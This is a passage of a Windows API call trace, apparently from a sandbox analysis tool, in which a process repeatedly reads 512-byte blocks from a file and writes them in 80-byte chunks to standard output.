lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.860] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.860] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.861] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.861] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] GetFileType (hFile=0x4c) returned 0x1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] GetFileType (hFile=0x4c) returned 0x1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] GetFileType (hFile=0x4c) returned 0x1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] GetFileType (hFile=0x4c) returned 0x1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] GetFileType (hFile=0x4c) returned 0x1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] GetFileType (hFile=0x4c) returned 0x1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] GetFileType (hFile=0x4c) returned 0x1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] GetFileType (hFile=0x4c) returned 0x1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.861] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.861] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.862] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.862] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] GetFileType (hFile=0x4c) returned 0x1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] GetFileType (hFile=0x4c) returned 0x1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] GetFileType (hFile=0x4c) returned 0x1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] GetFileType (hFile=0x4c) returned 0x1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] GetFileType (hFile=0x4c) returned 0x1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] GetFileType (hFile=0x4c) returned 0x1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] GetFileType (hFile=0x4c) returned 0x1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] GetFileType (hFile=0x4c) returned 0x1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.862] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.862] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.863] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.863] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] GetFileType (hFile=0x4c) returned 0x1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] GetFileType (hFile=0x4c) returned 0x1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] GetFileType (hFile=0x4c) returned 0x1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] GetFileType (hFile=0x4c) returned 0x1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] GetFileType (hFile=0x4c) returned 0x1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] GetFileType (hFile=0x4c) returned 0x1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] GetFileType (hFile=0x4c) returned 0x1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] GetFileType (hFile=0x4c) returned 0x1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.863] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.863] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.864] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.864] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] GetFileType (hFile=0x4c) returned 0x1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] GetFileType (hFile=0x4c) returned 0x1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] GetFileType (hFile=0x4c) returned 0x1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] GetFileType (hFile=0x4c) returned 0x1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] GetFileType (hFile=0x4c) returned 0x1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] GetFileType (hFile=0x4c) returned 0x1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] GetFileType (hFile=0x4c) returned 0x1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] GetFileType (hFile=0x4c) returned 0x1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.864] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.864] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.865] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.865] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] GetFileType (hFile=0x4c) returned 0x1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] GetFileType (hFile=0x4c) returned 0x1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] GetFileType (hFile=0x4c) returned 0x1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] GetFileType (hFile=0x4c) returned 0x1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] GetFileType (hFile=0x4c) returned 0x1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] GetFileType (hFile=0x4c) returned 0x1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] GetFileType (hFile=0x4c) returned 0x1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] GetFileType (hFile=0x4c) returned 0x1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.866] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.866] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.866] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.866] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] GetFileType (hFile=0x4c) returned 0x1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] GetFileType (hFile=0x4c) returned 0x1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] GetFileType (hFile=0x4c) returned 0x1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] GetFileType (hFile=0x4c) returned 0x1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] GetFileType (hFile=0x4c) returned 0x1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] GetFileType (hFile=0x4c) returned 0x1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] GetFileType (hFile=0x4c) returned 0x1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] GetFileType (hFile=0x4c) returned 0x1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.867] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.867] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.867] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.867] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] GetFileType (hFile=0x4c) returned 0x1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] GetFileType (hFile=0x4c) returned 0x1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] GetFileType (hFile=0x4c) returned 0x1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] GetFileType (hFile=0x4c) returned 0x1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] GetFileType (hFile=0x4c) returned 0x1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] GetFileType (hFile=0x4c) returned 0x1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] GetFileType (hFile=0x4c) returned 0x1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] GetFileType (hFile=0x4c) returned 0x1 [0111.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.867] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.868] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.868] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.868] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.868] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.868] GetFileType (hFile=0x4c) returned 0x1 [0111.868] _get_osfhandle (_FileHandle=1) returned 